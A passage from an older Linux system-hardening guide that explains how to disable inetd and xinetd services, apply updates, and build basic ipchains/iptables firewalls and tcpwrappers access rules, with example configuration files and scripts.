stop these services. xinetd is an enhanced inetd replacement, and is
configured differently (see next section below).

Below is a partial snippet from a typical inetd.conf. Any service with a "#"
at the beginning of the line is "commented out", and thus ignored by inetd,
and consequently disabled.

+---------------------------------------------------------------------------+
|#                                                                          |
|# inetd.conf  This file describes the services that will be available      |
|#    through the INETD TCP/IP super server.  To re-configure               |
|#    the running INETD process, edit this file, then send the              |
|#    INETD process a SIGHUP signal.                                        |
|#                                                                          |
|# Version:  @(#)/etc/inetd.conf  3.10  05/27/93                            |
|#                                                                          |
|# Authors:  Original taken from BSD UNIX 4.3/TAHOE.                        |
|#    Fred N. van Kempen, <waltje@uwalt.nl.mugnet.org>                      |
|#                                                                          |
|# Modified for Debian Linux by Ian A. Murdock <imurdock@shell.portal.com>  |
|#                                                                          |
|# Echo, discard, daytime, and chargen are used primarily for testing.      |
|#                                                                          |
|# To re-read this file after changes, just do a 'killall -HUP inetd'       |
|#                                                                          |
|#echo  stream  tcp  nowait  root  internal                                 |
|#echo  dgram  udp   wait    root  internal                                 |
|#discard  stream  tcp  nowait  root  internal                              |
|#discard  dgram  udp   wait    root  internal                              |
|#daytime  stream tcp   nowait  root  internal                              |
|#daytime  dgram  udp   wait    root  internal                              |
|#chargen  stream tcp   nowait  root  internal                              |
|#chargen  dgram  udp   wait    root  internal                              |
|time  stream    tcp   nowait  root  internal                               |
|#                                                                          |
|# These are standard services.                                             |
|#                                                                          |
|#ftp     stream  tcp   nowait  root  /usr/sbin/tcpd  in.ftpd -l -a         |
|#telnet  stream  tcp   nowait  root  /usr/sbin/tcpd  in.telnetd            |
|#                                                                          |
|# Shell, login, exec, comsat and talk are BSD protocols.                   |
|#                                                                          |
|#shell  stream  tcp  nowait  root  /usr/sbin/tcpd  in.rshd                 |
|#login  stream  tcp  nowait  root  /usr/sbin/tcpd  in.rlogind              |
|#exec   stream  tcp  nowait  root  /usr/sbin/tcpd  in.rexecd               |
|#comsat dgram   udp  wait    root  /usr/sbin/tcpd  in.comsat               |
|#talk   dgram   udp  wait    root  /usr/sbin/tcpd  in.talkd                |
|#ntalk  dgram   udp  wait    root  /usr/sbin/tcpd  in.ntalkd               |
|#dtalk  stream  tcp  wait    nobody /usr/sbin/tcpd in.dtalkd               |
|#                                                                          |
|# Pop and imap mail services et al                                         |
|#                                                                          |
|#pop-2   stream  tcp     nowait  root    /usr/sbin/tcpd  ipop2d            |
|pop-3    stream  tcp     nowait  root    /usr/sbin/tcpd  ipop3d            |
|#imap    stream  tcp     nowait  root    /usr/sbin/tcpd  imapd             |
|#                                                                          |
|# The Internet UUCP service.                                               |
|#                                                                          |
|#uucp  stream tcp nowait uucp /usr/sbin/tcpd  /usr/lib/uucp/uucico -l      |
|#                                                                          |
|                                                                           |
|<snip>                                                                     |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

The above example has two services enabled: time and pop3. To disable these,
all we need is to open the file with a text editor, comment out the two
services with a "#", save the file, and then restart inetd (as root):

+---------------------------------------------------------------------------+
|  # /etc/init.d/inetd restart                                              |
|                                                                           |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Check your logs for errors, and run netstat again to verify all went well.

A quicker way of getting the same information, using grep:

+---------------------------------------------------------------------------+
| $ grep  -v '^#' /etc/inetd.conf                                           |
| time     stream  tcp     nowait  root  internal                           |
| pop-3    stream  tcp     nowait  root  /usr/sbin/tcpd  ipop3d             |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Again, do you see anything there that you don't know what it is? Then in all
likelihood you are not using it, and it should be disabled.

Unlike the init services configuration, this is a lasting change so only the
one step is required.

Let's expose one myth that gets tossed around: you shouldn't disable a
service by commenting out, or removing, entries from /etc/services. This may
have the desired effect in some cases, but is not the right way to do it, and
may interfere with the normal operation of other system utilities.
-----------------------------------------------------------------------------

3.3.3. Xinetd

xinetd is an inetd replacement with enhancements. It essentially serves the
same purpose as inetd, but the configuration is different. The configuration
can be in the file /etc/xinetd.conf, or individual files in the directory /
etc/xinetd.d/. Turning off xinetd services is done by either deleting the
corresponding configuration section, or file. Or by using your text editor
and simply setting disable = yes for the appropriate service. Then, xinetd
will need to be restarted. See man xinetd and man xinetd.conf for syntax and
configuration options. A sample xinetd configuration:

+---------------------------------------------------------------------------+
| # default: on                                                             |
| # description: The wu-ftpd FTP server serves FTP connections. It uses \   |
| #       normal, unencrypted usernames and passwords for authentication.   |
| service ftp                                                               |
| {                                                                         |
|        disable                 = no                                       |
|        socket_type             = stream                                   |
|        wait                    = no                                       |
|        user                    = root                                     |
|        server                  = /usr/sbin/in.ftpd                        |
|        server_args             = -l -a                                    |
|        log_on_success          += DURATION USERID                         |
|        log_on_failure          += USERID                                  |
|        nice                    = 10                                       |
| }                                                                         |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

You can get a quick list of enabled services:

+---------------------------------------------------------------------------+
| $ grep disable /etc/xinetd.d/* |grep no                                   |
| /etc/xinetd.d/finger:   disable = no                                      |
| /etc/xinetd.d/rexec:    disable = no                                      |
| /etc/xinetd.d/rlogin:   disable = no                                      |
| /etc/xinetd.d/rsh:      disable = no                                      |
| /etc/xinetd.d/telnet:   disable = no                                      |
| /etc/xinetd.d/wu-ftpd:  disable = no                                      |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

At this point, the above output should raise some red flags. In the
overwhelming majority of systems, all the above can be disabled without any
adverse impact. Not sure? Try it without that service. After disabling
unnecessary services, then restart xinetd:

+---------------------------------------------------------------------------+
|  # /etc/init.d/xinetd restart                                             |
|                                                                           |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+
-----------------------------------------------------------------------------

3.3.4. When All Else Fails

OK, if you can't find the "right" way to stop a service, or maybe a service
is being started and you can't find how or where, you can "kill" the process.
To do this, you will need to know the PID (Process I.D.). This can be found
with ps, top, fuser or other system utilities. For top and ps, this will be
the number in the first column. See the Port and Process Owner section in the
Appendix for examples.

Example (as root):

+---------------------------------------------------------------------------+
| # kill 1163                                                               |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Then run top or ps again to verify that the process is gone. If not, then:

+---------------------------------------------------------------------------+
| # kill -KILL 1163                                                         |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

Note the second "KILL" in there. This must be done either by the user who
owns the process, or root. Now go find where and how this process got started
;-)

The /proc filesystem can also be used to find out more information about each
process. Armed with the PID, we can find the path to a mysterious process:

+---------------------------------------------------------------------------+
| $ /bin/ps ax|grep tcpgate                                                 |
|  921 ?   S    0:00        tcpgate                                         |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

+----------------------------------------------------------------------------------+
| # ls -l /proc/921/exe                                                            |
| lrwxrwxrwx 1 root  root  0 July 21 12:11 /proc/921/exe -> /usr/local/bin/tcpgate |
|                                                                                  |
|                                                                                  |
+----------------------------------------------------------------------------------+
-----------------------------------------------------------------------------

3.4. Exceptions

Above we used the criteria of turning off all unnecessary services. Sometimes
that is not so obvious. And sometimes what may be required for one person's
configuration is not the same for another's. Let's look at a few common
services that fall in this category.

Again, our rule of thumb is if we don't need it, we won't run it. It's that
simple. If we do need any of these, they are prime candidates for some kind
of restrictive policies via firewall rules or other mechanisms (see below).

<A0><A0>*<2A>identd - This is a protocol that has been around for ages, and is often
    installed and running by default. It is used to provide a minimal amount
    of information about who is connecting to a server. But, it is not
    necessary in many cases. Where might you need it? Most IRC servers
    require it. Many mail servers use it, but don't really require it. Try
    your mail setup without it. If identd is going to be a problem, it will
    be because there is a time out before before the server starts sending or
    receiving mail. So mail should work fine without it, but may be slower. A
    few ftp servers may require it. Most don't though.

    If identd is required, there are some configuration options that can
    greatly reduce the information that is revealed:

    +---------------------------------------------------------------+
    |                                                               |
    |    /usr/sbin/in.identd in.identd -l -e -o -n -N               |
    |                                                               |
    |                                                               |
    +---------------------------------------------------------------+

    The -o flag tells identd to not reveal the operating system type it is
    run on and to instead always return "OTHER". The -e flag tells identd to
    always return "UNKNOWN-ERROR" instead of the "NO-USER" or "INVALID-PORT"
    errors. The -n flag tells identd to always return user numbers instead of
    user names, if you wish to keep the user names a secret. The -N flag
    makes identd check for the file .noident in the user's home directory for
    which the daemon is about to return a user name. It that file exists then
    the daemon will give the error "HIDDEN-USER" instead of the normal
    "USERID" response.

<A0><A0>*<2A>Mail server (MTA's like sendmail, qmail, etc) - Often a fully functional
    mail server like sendmail is installed by default. The only time that
    this is actually required is if you are hosting a domain, and receiving
    incoming mail directly. Or possibly, for exchanging mail on a LAN, in
    which case it does not need Internet exposure and can be safely
    firewalled. For your ISP's POP mail access, you don't need it even though
    this is a common configuration. One alternative here is to use fetchmail
    for POP mail retrieval with the -m option to specify a local delivery
    agent: fetchmail -m procmail for instance works with no sendmail daemon
    running at all. Sendmail, can be handy to have running, but the point is,
    it is not required in many situations, and can be disabled, or firewalled
    safely.

<A0><A0>*<2A>BIND (named) - This often is installed by default, but is only really
    needed if you are an authoritative name server for a domain. If you are
    not sure what this means, then you definitely don't need it. BIND is
    probably the number one crack target on the Internet. BIND is often used
    though in a "caching" only mode. This can be quite useful, but does not
    require full exposure to the Internet. In other words, it should be
    restricted or firewalled. See special handling of individual applications
    below.


-----------------------------------------------------------------------------
3.5. Summary and Conclusions for Step 1

In this section we learned how to identify which services are running on our
system, and were given some tips on how to determine which services may be
necessary. Then we learned how to find where the services were being started,
and how to stop them. If this has not made sense, now is a good time to
re-read the above.

Hopefully you've already taken the above steps. Be sure to test your results
with netstat again, just to verify the desired end has been achieved, and
only the services that are really required are running.

It would also be wise to do this after the next reboot, anytime you upgrade a
package (to make sure a new configuration does not sneak in), and after every
system upgrade or new install.
-----------------------------------------------------------------------------

4. Step 2: Updating

OK, this section should be comparatively short, simple and straightforward
compared to the above, but no less important.

The very first thing after a new install you should check your distribution's
updates and security notices and apply all patches . Only a year old you say?
That's a long time actually, and not current enough to be safe. Only a few
months or few weeks? Check anyway. A day or two? Better safe than sorry. It
is quite possible that security updates have been released during the
pre-release phase of the development and release cycle. If you can't take
this step, disable any publicly accessible services until you can.

Linux distributions are not static entities. They are updated with new,
patched packages as the need arises. The updates are just as important as the
original installation. Even more so, since they are fixes. Sometimes these
updates are bug fixes, but quite often they are security fixes because some
hole has been discovered. Such "holes" are immediately known to the cracker
community, and they are quick to exploit them on a large scale. Once the hole
is known, it is quite simple to get in through it, and there will be many out
there looking for it. And Linux developers are also equally quick to provide
fixes. Sometimes the same day as the hole has become known!

Keeping all installed packages current with your release is one of the most
important steps you can take in maintaining a secure system. It can not be
emphasized enough that all installed packages should be kept updated -- not
just the ones you use. If this is burdensome, consider uninstalling any
unused packages. Actually this is a good idea anyway.

But where to get this information in a timely fashion? There are a number of
web sites that offer the latest security news. There are also a number of
mailing lists dedicated to this topic. In fact, your vendor most likely has
such a list where vulnerabilities and the corresponding fix is announced.
This is an excellent way to stay abreast of issues effecting your release,
and is highly recommended. [http://linuxsecurity.com] http://
linuxsecurity.com is a good site for Linux only issues. They also have weekly
newsletters available: [http://www.linuxsecurity.com/general/newsletter.html]
http://www.linuxsecurity.com/general/newsletter.html.

Also, many distributions have utilities that will automatically update your
installed packages via ftp. This can be run as a cron job on a regular basis
and is a painless way to go if you have ready Internet access.

This is not a one time process -- it is ongoing. It is important to stay
current. So watch those security notices. And subscribe to your vendor's
security mailing list today! If you have cable modem, DSL, or other full time
connection, there is no excuse not to do this religiously. All distributions
make this easy enough!

One last note: any time a new package is installed, there is also a chance
that a new or revised configuration has been installed as well. Which means
that if this package is a server of some kind, it may be enabled as a result
of the update. This is bad manners, but it can happen, so be sure to run
netstat or comparable to verify your system is where you want it after any
updates or system changes. In fact, do it periodically even if there are no
such changes.
-----------------------------------------------------------------------------

4.1. Summary and Conclusions for Step 2

It is very simple: make sure your Linux installation is current. Check with
your vendor for what updated packages may be available. There is nothing
wrong with running an older release, just so the packages in it are updated
according to what your vendor has made available since the initial release.
At least as long as your vendor is still supporting the release and updates
are still being provided.
-----------------------------------------------------------------------------

5. Step 3: Firewalls and Setting Access Policies

So what is a "firewall"? It's a vague term that can mean anything that acts
as a protective barrier between us and the outside world. This can be a
dedicated system, or a specific application that provides this functionality.
Or it can be a combination of components, including various combinations of
hardware and software. Firewalls are built from "rules" that are used to
define what is allowed to enter and exit a given system or network. Let's
look at some of the possible components that are readily available for Linux,
and how we might implement a reasonably safe firewalling strategy.

In Step 1 above, we have turned off all services we don't need. In our
example, there were a few we still needed to have running. In this section,
we will take the next step here and decide which we need to leave open to the
world. And which we might be able to restrict in some way. If we can block
them all, so much the better, but this is not always practical.
-----------------------------------------------------------------------------

5.1. Strategy

What we want to do now is restrict connections and traffic so that we only
allow the minimum necessary for whatever our particular situation is. In some
cases we may want to block all incoming "new" connection attempts. Example:
we want to run X, but don't want anyone from outside to access it, so we'll
block it completely from outside connections. In other situations, we may
want to limit, or restrict, incoming connections to trusted sources only. The
more restrictive, the better. Example: we want to ssh into our system from
outside, but we only ever do this from our workplace. So we'll limit sshd
connections to our workplace address range. There are various ways to do
this, and we'll look at the most common ones.

We also will not want to limit our firewall to any one application. There is
nothing wrong with a "layered" defense-in-depth approach. Our front line
protection will be a packet filter -- either ipchains or iptables (see
below). Then we can use additional tools and mechanisms to reinforce our
firewall.

We will include some brief examples. Our rule of thumb will be to deny
everything as the default policy, then open up just what we need. We'll try
to keep this as simple as possible since it can be an involved and complex
topic, and just stick to some of the most basic concepts. See the Links
section for further reading on this topic.
-----------------------------------------------------------------------------

5.2. Packet Filters -- Ipchains and Iptables

"Packet filters" (like ipchains) have the ability to look at individual
packets, and make decisions based on what they find. These can be used for
many purposes. One common purpose is to implement a firewall.

Common packet filters on Linux are ipchains which is standard with 2.2
kernels, and iptables which is available with the more recent 2.4 kernels.
iptables has more advanced packet filtering capabilities and is recommended
for anyone running a 2.4 kernel. But either can be effective for our
purposes. ipfwadm is a similar utility for 2.0 kernels (not discussed here).

If constructing your own ipchains or iptables firewall rules seems a bit
daunting, there are various sites that can automate the process. See the
Links section. Also the included examples may be used as a starting point.
And your distribution may be including a utility of some kind for generating
a firewall script. This may be adequate, but it is still recommended to know
the proper syntax and how the various mechanisms work as such tools rarely do
more than a few very simple rules.

Note Various examples are given below. These are presented for illustrative
     purposes to demonstrate some of the concepts being discussed here. While
     they might also be useful as a starting point for your own script,
     please note that they are not meant to be all encompassing. You are
     strongly encouraged to understand how the scripts work, so you can
     create something even more tailored for your own situation.

     The example scripts are just protecting inbound connections to one
     interface (the one connected to the Internet). This may be adequate for
     many simple home type situations, but, conversely, this approach is not
     adequate for all situations!
-----------------------------------------------------------------------------

5.2.1. ipchains

ipchains can be used with either 2.2 or 2.4 kernels. When ipchains is in
place, it checks every packet that moves through the system. The packets move
across different "chains", depending where they originate and where they are
going. Think of "chains" as rule sets. In advanced configurations, we could
define our own custom chains. The three default built-in chains are input,
which is incoming traffic, output, which is outgoing traffic, and forward,
which is traffic being forwarded from one interface to another (typically
used for "masquerading"). Chains can be manipulated in various ways to
control the flow of traffic in and out of our system. Rules can be added at
our discretion to achieve the desired result.

At the end of every "chain" is a "target". The target is specified with the
-j option to the command. The target is what decides the fate of the packet
and essentially terminates that particular chain. The most common targets are
mostly self-explanatory: ACCEPT, DENY, REJECT, and MASQ. MASQ is for
"ipmasquerading". DENY and REJECT essentially do the same thing, though in
different ways. Is one better than the other? That is the subject of much
debate, and depends on other factors that are beyond the scope of this
document. For our purposes, either should suffice.

ipchains has a very flexible configuration. Port (or port ranges),
interfaces, destination address, source address can be specified, as well as
various other options. The man page explains these details well enough that
we won't get into specifics here.

Traffic entering our system from the Internet, enters via the input chain.
This is the one that we need as tight as we can make it.

Below is a brief example script for a hypothetical system. We'll let the
comments explain what this script does. Anything starting with a "#" is a
comment. ipchains rules are generally incorporated into shell scripts, using
shell variables to help implement the firewalling logic.

#!/bin/sh
#
# ipchains.sh
#
# An example of a simple ipchains configuration.
#
# This script allows ALL outbound traffic, and denies
# ALL inbound connection attempts from the outside.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
IPCHAINS=/sbin/ipchains
# This is the WAN interface, that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"

## end user configuration options #################################
###################################################################

# The high ports used mostly for connections we initiate and return
# traffic.
LOCAL_PORTS=`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f1`:\
`cat /proc/sys/net/ipv4/ip_local_port_range |cut -f2`

# Any and all addresses from anywhere.
ANYWHERE="0/0"

# Let's start clean and flush all chains to an empty state.
$IPCHAINS -F

# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that ipchains uses.
$IPCHAINS -P forward DENY
$IPCHAINS -P output ACCEPT
$IPCHAINS -P input DENY

# Accept localhost/loopback traffic.
$IPCHAINS -A input -i lo -j ACCEPT

# Get our dynamic IP now from the Inet interface. WAN_IP will be our
# IP address we are protecting from the outside world. Put this
# here, so default policy gets set, even if interface is not up
# yet.
WAN_IP=`ifconfig $WAN_IFACE |grep inet |cut -d : -f 2 |cut -d \  -f 1`

# Bail out with error message if no IP available! Default policy is
# already set, so all is not lost here.
[ -z "$WAN_IP" ] && echo "$WAN_IFACE not configured, aborting." && exit 1

# Accept non-SYN TCP, and UDP connections to LOCAL_PORTS. These are
# the high, unprivileged ports (1024 to 4999 by default). This will
# allow return connection traffic for connections that we initiate
# to outside sources. TCP connections are opened with 'SYN' packets.
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS ! -y -j ACCEPT

# We can't be so selective with UDP since that protocol does not
# know about SYNs.
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS -j ACCEPT

## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPCHAINS -A input  -p icmp  --icmp-type echo-reply \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input  -p icmp  --icmp-type destination-unreachable \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPCHAINS -A input  -p icmp  --icmp-type time-exceeded \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT

###################################################################
# Set the catchall, default rule to DENY, and log it all. All other
# traffic not allowed by the rules above, winds up here, where it is
# blocked and logged. This is the default policy for this chain
# anyway, so we are just adding the logging ability here with '-l'.
# Outgoing traffic is allowed as the default policy for the 'output'
# chain. There are no restrictions on that.

$IPCHAINS -A input -l -j DENY

echo "Ipchains firewall is up `date`."

##-- eof ipchains.sh


To use the above script would require that it is executable (i.e. chmod +x
ipchains.sh), and run by root to build the chains, and hence the firewall.

To summarize what this example did was to start by setting some shell
variables in the top section, to be used later in the script. Then we set the
default rules (ipchains calls these "policies") of denying all inbound and
forwarded traffic, and of allowing all our own outbound traffic. We had to
open some holes in the high, unprivileged ports so that we could have return
traffic from connections that bigcat initiates to outside addresses. If we
connect to someone's web server, we want that HTML data to be able to get
back to us, for instance. The same applies to other network traffic. We then
allowed a few specific types of the ICMP protocol (most are still blocked).
We are also logging any inbound traffic that violates any of our rules so we
know who is doing what. Notice that we are only using IP address here, not
hostnames of any kind. This is so that our firewall works, even in situation
where there may be DNS failures. Also, to prevent any kind of DNS spoofing.

See the ipchains man page for a full explanation of syntax. The important
ones we used here are:


    <20>-A input: Adds a rule to the "input" chain. The default chains are
    input, output, and forward.

    <20>-p udp: This rule only applies to the "UDP" "protocol". The -p option
    can be used with tcp, udp or icmp protocols.

    <20>-i $WAN_IFACE: This rule applies to the specified interface only, and
    applies to whatever chain is referenced (input, output, or forward).

    <20>-s <IP address> [port]: This rule only applies to the source address as
    specified. It can optionally have a port (e.g. 22) immediately afterward,
    or port range, e.g. 1023:4999.

    <20>-d <IP address> [port]: This rule only applies to the destination
    address as specified. Also, it may include port or port range.

    <20>-l : Any packet that hits a rule with this option is logged (lower case
    "L").

    <20>-j ACCEPT: Jumps to the "ACCEPT" "target". This effectively terminates
    this chain and decides the ultimate fate for this particular packet,
    which in this example is to "ACCEPT" it. The same is true for other -j
    targets like DENY.


By and large, the order in which command line options are specified is not
significant. The chain name (e.g. input) must come first though.

Remember in Step 1 when we ran netstat, we had both X and print servers
running among other things. We don't want these exposed to the Internet, even
in a limited way. These are still happily running on bigcat, but are now safe
and sound behind our ipchains based firewall. You probably have other
services that fall in this category as well.

The above example is a simplistic all or none approach. We allow all our own
outbound traffic (not necessarily a good idea), and block all inbound
connection attempts from outside. It is only protecting one interface, and
really just the inbound side of that interface. It would more than likely
require a bit of fine tuning to make it work for you. For a more advanced set
of rules, see the Appendix. And you might want to read [http://tldp.org/HOWTO
/IPCHAINS-HOWTO.html] http://tldp.org/HOWTO/IPCHAINS-HOWTO.html.

Whenever you have made changes to your firewall, you should verify its
integrity. One step to make sure your rules seem to be doing what you
intended, is to see how ipchains has interpreted your script. You can do this
by opening your xterm very wide, and issuing the following command:

+---------------------------------------------------------------------------+
| # ipchains -L -n -v | less                                                |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

The output is grouped according to chain. You should also find a way to scan
yourself (see the Verifying section below). And then keep an eye on your logs
to make sure you are blocking what is intended.
-----------------------------------------------------------------------------

5.2.2. iptables

iptables is the next generation packet filter for Linux, and requires a 2.4
kernel. It can do everything ipchains can, but has a number of noteworthy
enhancements. The syntax is similar to ipchains in many respects. See the man
page for details.

The most noteworthy enhancement is "connection tracking", also known as
"stateful inspection". This gives iptables more knowledge of the state of
each packet. Not only does it know if the packet is a TCP or UDP packet, or
whether it has the SYN or ACK flags set, but also if it is part of an
existing connection, or related somehow to an existing connection. The
implications for firewalling should be obvious.

The bottom line is that it is easier to get a tight firewall with iptables,
than with ipchains. So this is the recommended way to go.

Here is the same script as above, revised for iptables:

#!/bin/sh
#
# iptables.sh
#
# An example of a simple iptables configuration.
#
# This script allows ALL outbound traffic, and denies
# ALL inbound connection attempts from the Internet interface only.
#
###################################################################
# Begin variable declarations and user configuration options ######
#
IPTABLES=/sbin/iptables
# Local Interfaces
# This is the WAN interface that is our link to the outside world.
# For pppd and pppoe users.
# WAN_IFACE="ppp0"
WAN_IFACE="eth0"
#

## end user configuration options #################################
###################################################################

# Any and all addresses from anywhere.
ANYWHERE="0/0"

# This module may need to be loaded:
modprobe ip_conntrack_ftp

# Start building chains and rules #################################
#
# Let's start clean and flush all chains to an empty state.
$IPTABLES -F

# Set the default policies of the built-in chains. If no match for any
# of the rules below, these will be the defaults that IPTABLES uses.
$IPTABLES -P FORWARD DROP
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P INPUT DROP

# Accept localhost/loopback traffic.
$IPTABLES -A INPUT -i lo -j ACCEPT

## ICMP (ping)
#
# ICMP rules, allow the bare essential types of ICMP only. Ping
# request is blocked, ie we won't respond to someone else's pings,
# but can still ping out.
$IPTABLES -A INPUT  -p icmp  --icmp-type echo-reply \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPTABLES -A INPUT  -p icmp  --icmp-type destination-unreachable \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT
$IPTABLES -A INPUT  -p icmp  --icmp-type time-exceeded \
   -s $ANYWHERE -i $WAN_IFACE -j ACCEPT

###################################################################
# Set the catchall, default rule to DENY, and log it all. All other
# traffic not allowed by the rules above, winds up here, where it is
# blocked and logged. This is the default policy for this chain
# anyway, so we are just adding the logging ability here with '-j
# LOG'. Outgoing traffic is allowed as the default policy for the
# 'output' chain. There are no restrictions on that.

$IPTABLES -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPTABLES -A INPUT -m state --state NEW -i ! $WAN_IFACE -j ACCEPT
$IPTABLES -A INPUT -j LOG -m limit --limit 30/minute --log-prefix "Dropping: "

echo "Iptables firewall is up `date`."

##-- eof iptables.sh


The same script logic is used here, and thus this does pretty much the same
exact thing as the ipchains script in the previous section. There are some
subtle differences as to syntax. Note the case difference in the chain names
for one (e.g. INPUT vs input). Logging is handled differently too. It has its
own "target" now (-j LOG), and is much more flexible.

There are some very fundamental differences as well, that might not be so
obvious. Remember this section from the ipchains script:

# Accept non-SYN TCP, and UDP connections to LOCAL_PORTS. These are the high,
# unprivileged ports (1024 to 4999 by default). This will allow return
# connection traffic for connections that we initiate to outside sources.
# TCP connections are opened with 'SYN' packets. We have already opened
# those services that need to accept SYNs for, so other SYNs are excluded here
# for everything else.
$IPCHAINS -A input -p tcp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS ! -y -j ACCEPT

# We can't be so selective with UDP since that protocol does not know
# about SYNs.
$IPCHAINS -A input -p udp -s $ANYWHERE -d $WAN_IP $LOCAL_PORTS -j ACCEPT


We jumped through hoops here with ipchains so that we could restrict
unwanted, incoming connections as much as possible. A bit of a kludge,
actually.

That section is missing from the iptables version. It is not needed as
connection tracking handles this quite nicely, and then some. This is due to
the "statefulness" of iptables. It knows more about each packet than ipchains
. For instance, it knows whether the packet is part of a "new" connection, or
an "established" connection, or a "related" connection. This is the so-called
"stateful inspection" of connection tracking.

There are many, many features of iptables that are not touched on here. For
more reading on the Netfilter project and iptables, see [http://
netfilter.samba.org] http://netfilter.samba.org. And for a more advanced set
of rules, see the Appendix.
-----------------------------------------------------------------------------

5.3. Tcpwrappers (libwrap)

Tcpwrappers provides much the same desired results as ipchains and iptables
above, though works quite differently. Tcpwrappers actually intercepts the
connection attempt, then examines its configurations files, and decides
whether to accept or reject the request. Tcpwrappers controls access at the
application level, rather than the socket level like iptables and ipchains.
This can be quite effective, and is a standard component on most Linux
systems.

Tcpwrappers consists of the configuration files /etc/hosts.allow and /etc/
hosts.deny. The functionality is provided by the libwrap library.

Tcpwrappers first looks to see if access is permitted in /etc/hosts.allow,
and if so, access is granted. If not in /etc/hosts.allow, the file /etc/
hosts.deny is then checked to see if access is not allowed. If so, access is
denied. Else, access is granted. For this reason, /etc/hosts.deny should
contain only one uncommented line, and that is: ALL: ALL. Access should then
be permitted through entries in /etc/hosts.allow, where specific services are
listed, along with the specific host addresses allowed to access these
services. While hostnames can be used here, use of hostnames opens the
limited possibility for name spoofing.

Tcpwrappers is commonly used to protect services that are started via inetd
(or xinetd). But also any program that has been compiled with libwrap
support, can take advantage of it. Just don't assume that all programs have
built in libwrap support -- they do not. In fact, most probably don't. So we
will only use it in our examples here to protect services start via inetd.
And then rely on our packet filtering firewall, or other mechanism, to
protect non-(x)inetd services.

Below is a small snippet from a typical inetd.conf file:

+---------------------------------------------------------------------------+
| # Pop and imap mail services et al                                        |
| #                                                                         |
| #pop-2   stream  tcp     nowait  root    /usr/sbin/tcpd ipop2d            |
| #pop-3   stream  tcp     nowait  root    /usr/sbin/tcpd ipop3d            |
| #imap    stream  tcp     nowait  root    /usr/sbin/tcpd imapd             |
| #                                                                         |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

The second to last column is the tcpwrappers daemon -- /usr/sbin/tcpd.
Immediately after is the daemon it is protecting. In this case, POP and IMAP
mail servers. Your distro probably has already done this part for you. For
the few applications that have built-in support for tcpwrappers via the
libwrap library, specifying the daemon as above is not necessary.

We will use the same principles here: default policy is to deny everything,
then open holes to allow the minimal amount of traffic necessary.

So now with your text editor, su to root and open /etc/hosts.deny. If it does
not exist, then create it. It is just a plain text file. We want the
following line:

+---------------------------------------------------------------------------+
| ALL: ALL                                                                  |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

If it is there already, fine. If not, add it in and then save and close file.
Easy enough. "ALL" is one of the keywords that tcpwrappers understands. The
format is $SERVICE_NAME : $WHO, so we are denying all connections to all
services here. At least all services that are using tcpwrappers. Remember,
this will primarily be inetd services. See man 5 hosts_access for details on
the syntax of these files. Note the "5" there!

Now let's open up just the services we need, as restrictively as we can, with
a brief example:

+---------------------------------------------------------------------------+
| ALL: 127.0.0.1                                                            |
| sshd,ipop3d: 192.168.1.                                                   |
| sshd: .myworkplace.com, hostess.mymomshouse.com                           |
|                                                                           |
|                                                                           |
+---------------------------------------------------------------------------+

The first line allows all "localhost" connections. You will need this. The
second allows connections to the sshd and ipop3d services from IP addresses
that start with 192.168.1., in this case the private address range for our
hypothetical home LAN. Note the trailing ".". It's important. The third line
allows connections to only our sshd daemon from any host associated with
.myworkplace.com. Note the leading "." in this example. And then also, the
single host hostess.mymomshouse.com. In summary, localhost and all our LAN
connections have access to any and all tcpwrappered services on bigcat. But
only our workplace addresses, and our mother can use sshd on bigcat from
outside connections. Everybody else is denied by the default policy in /etc/
hosts.deny.

The types of wild cards above (.myworkplace.com and 192.168.1.) are not
supported by ipchains and iptables, or most other Linux applications for that
matter. Also, tcpwrappers can use hostnames in place of IP addresses which is
quite handy in some situations. This does not work with ipchains and iptables
.

You can test your tcpwrappers configuration with the included tcpdchk utility
(see the man page). Note that at this time this does not work with xinetd,
and may not even be included in this case.

There is nothing wrong with using both tcpwrappers and a packet filtering
firewall like ipchains. In fact, it is recommended to use a "layered"
approach. This helps guard against accidental misconfigurations. In this
case, each connection will be tested by the packet filter rules first, then
tcpwrappers.

Remember to make backup copies before editing system configuration files,
restart the daemon afterward, and then check the logs for error messages.
-----------------------------------------------------------------------------

5.3.1. xinetd

As mentioned, [http://www.xinetd.org] xinetd is an enhanced inetd . It has
much of the same functionality, with some notable enhancements. One is that
tcpwrappers support can be compiled in, eliminating the need for explicit
references to tcpd. Which means /etc/hosts.allow and /etc/hosts.deny are
automatically in effect. Don't assume this is the case though. A little
testing, then viewing the logs should be able to tell you whether tcpwrappers
support is automatic or not.

Some of xinetd's other enhancements: specify IP address to listen on, which
is a very effective method of access control; limit the rate of incoming
connections and the total number of simultaneous connections; limit services
to specific times of day. See the xinetd and xinetd.conf man pages for more
details.

The syntax is quite different though. An example from /etc/xinetd.d/tftp:

